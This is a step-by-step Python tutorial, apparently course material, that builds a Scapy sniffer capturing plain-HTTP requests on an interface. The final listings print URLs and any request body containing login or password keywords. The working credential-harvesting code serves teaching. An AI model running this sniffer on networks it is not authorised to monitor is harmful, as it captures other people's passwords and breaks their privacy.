PACKET_SNIFFER
CODE: BASE#1
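#!/usr/bin/env python
"""Baseline capture script: print every packet seen on one interface."""
import scapy.all as scapy


def sniff(interface):
    """Capture packets on *interface* and pass each one to the callback.

    store=False tells Scapy not to keep captured packets, so a long-running
    capture does not accumulate them in memory.
    """
    # `prn` is the keyword Scapy uses for the per-packet callback; the other
    # listings on this page use it, and `prc` here was a typo.
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def process_sniffed_packet(packet):
    """Print one captured packet."""
    print(packet)


sniff("eth0")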
WITH DETAILS!
WE USE A 3RD-PARTY MODULE BECAUSE SCAPY BY ITSELF DOES NOT PARSE HTTP.
TO INSTALL THE 3RD-PARTY MODULE, RUN ANY OF THE COMMANDS BELOW:
- pip install scapy_http
- pip install layer.http
NOTE: THIS PROGRAMME WILL ONLY WORK ON PLAIN HTTP TRAFFIC; HTTPS TRAFFIC IS ENCRYPTED, SO ITS REQUESTS ARE NOT VISIBLE TO THE SNIFFER.
#EXTRACTING DATA FROM A SPECIFIC LAYER
CODE: BASE#2
#EXTRACTING OUR DESIRED OUTPUT!
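#!/usr/bin/env python
"""Show the full layer breakdown of every HTTP request seen on one interface."""
import scapy.all as scapy
from scapy.layers import http


def sniff(interface):
    """Capture packets on *interface* and pass each one to the callback.

    store=False tells Scapy not to keep captured packets in memory.
    """
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def process_sniffed_packet(packet):
    """Dump the layers and fields of a packet that carries an HTTP request."""
    # The layer class is HTTPRequest (it was misspelled "HTTPRepuest").
    # Only traffic Scapy can parse as HTTP matches, i.e. requests that were
    # not encrypted in transit.
    if packet.haslayer(http.HTTPRequest):
        # show() prints the dump itself and returns None, so wrapping it in
        # print() only added a stray "None" line after every packet.
        packet.show()


sniff("eth0")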
EXAMPLE: EXTRACTING just LOGIN/USERNAME
CODE: MODIFIED#1
#!/usr/bin/env python
"""Print the raw body of every HTTP request seen on one interface."""
import scapy.all as scapy
from scapy_http import http


def process_sniffed_packet(packet):
    """Print the Raw payload of *packet* when it is an HTTP request with a body."""
    is_http_request = packet.haslayer(http.HTTPRequest)
    # The Raw layer holds whatever follows the HTTP headers, which for a
    # form submission is the posted field data.
    if is_http_request and packet.haslayer(scapy.Raw):
        print(packet[scapy.Raw].load)


def sniff(interface):
    """Capture on *interface* without storing packets; each goes to the callback."""
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


sniff("eth0")
AN ISSUE:
If we keep sniffing, the Raw layer's load field itself contains too much data, so we cannot find what we are looking for.
To avoid this, we filter the load by keywords.
#USING KEYWORDS!!
[FINDING A SUBSTRING CONTAINED IN A LARGER STRING]
CODE: MODIFIED#2
#!/usr/bin/env python
"""Print HTTP request bodies that mention a login-related keyword."""
import scapy.all as scapy
from scapy_http import http


def process_sniffed_packet(packet):
    """Print the Raw payload of an HTTP request if it contains a keyword."""
    if not packet.haslayer(http.HTTPRequest):
        return
    if not packet.haslayer(scapy.Raw):
        return

    body = packet[scapy.Raw].load
    markers = ["username", "userName", "login", "password", "pass"]
    # NOTE: this listing is written for Python 2, where load is a str. On
    # Python 3 load is bytes and testing a str keyword against it raises
    # TypeError; the Python 3 listing on this page converts load first.
    if any(marker in body for marker in markers):
        # Printed once per packet, however many keywords match.
        print(body)


def sniff(interface):
    """Capture on *interface* without storing packets; each goes to the callback."""
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


sniff("eth0")
#EXTRACTING URLs!!
We use print(packet.show()) to find the layer and field that hold the URL.
CODE: MODIFIED#3
#!/usr/bin/env python
"""Print the URL of every HTTP request, plus bodies that mention a keyword."""
import scapy.all as scapy
from scapy_http import http


def process_sniffed_packet(packet):
    """Print the requested URL and, if present, a keyword-matching body."""
    if not packet.haslayer(http.HTTPRequest):
        return

    request = packet[http.HTTPRequest]
    # The URL is rebuilt from the Host header and the request path.
    print(request.Host + request.Path)

    if not packet.haslayer(scapy.Raw):
        return
    body = packet[scapy.Raw].load
    markers = ["username", "userName", "login", "password", "pass"]
    # NOTE: written for Python 2 (load is a str); on Python 3 load is bytes
    # and this membership test raises TypeError.
    if any(marker in body for marker in markers):
        print(body)


def sniff(interface):
    """Capture on *interface* without storing packets; each goes to the callback."""
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


sniff("eth0")
CODE: MODIFIED#4 [Applying more functions]
#!/usr/bin/env python
"""Report HTTP request URLs and request bodies that mention a login keyword."""
import scapy.all as scapy
from scapy_http import http


def sniff(interface):
    """Capture on *interface* without storing packets; each goes to the callback."""
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def get_url(packet):
    """Return Host + Path of the HTTP request carried by *packet*."""
    request = packet[http.HTTPRequest]
    return request.Host + request.Path


def get_login_info(packet):
    """Return the Raw payload if it contains a keyword, otherwise None."""
    if not packet.haslayer(scapy.Raw):
        return None
    body = packet[scapy.Raw].load
    markers = ["username", "userName", "login", "password", "pass"]
    # NOTE: written for Python 2 (load is a str); on Python 3 load is bytes
    # and this membership test raises TypeError.
    if any(marker in body for marker in markers):
        return body
    return None


def process_sniffed_packet(packet):
    """Print the URL of an HTTP request and any keyword-matching body."""
    if not packet.haslayer(http.HTTPRequest):
        return
    print("[+] HTTP Request >>" + get_url(packet))

    login_info = get_login_info(packet)
    if login_info:
        print("\n\n[+] Possible username/password >" + login_info + "\n\n")


sniff("eth0")
CODE: MODIFIED#4 - COMPATIBLE WITH PYTHON-3
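#!/usr/bin/env python
"""Python 3 version: report HTTP request URLs and keyword-matching bodies."""
import scapy.all as scapy
from scapy_http import http


def sniff(interface):
    """Capture on *interface* without storing packets; each goes to the callback."""
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def get_url(packet):
    """Return Host + Path of the HTTP request carried by *packet* (bytes)."""
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path


def get_login_info(packet):
    """Return the Raw payload as text if it contains a keyword, else None."""
    if not packet.haslayer(scapy.Raw):
        return None
    # str(bytes) yields the repr ("b'...'" with escape sequences), not the
    # text itself. Decode instead, replacing undecodable bytes so a binary
    # body cannot raise inside the capture callback.
    load = packet[scapy.Raw].load.decode(errors="replace")
    keywords = ["username", "userName", "login", "password", "pass"]
    for keyword in keywords:
        if keyword in load:
            return load
    return None


def process_sniffed_packet(packet):
    """Print the URL of an HTTP request and any keyword-matching body."""
    # Only requests Scapy can parse as HTTP get this far, i.e. traffic that
    # was not encrypted in transit.
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        # A strict decode() raises UnicodeDecodeError on a non-UTF-8 path;
        # errors="replace" keeps one odd request from ending the capture.
        print("[+] HTTP Request >>" + url.decode(errors="replace"))
        login_info = get_login_info(packet)
        if login_info:
            print("\n\n[+] Possible username/password >" + login_info + "\n\n")


sniff("eth0")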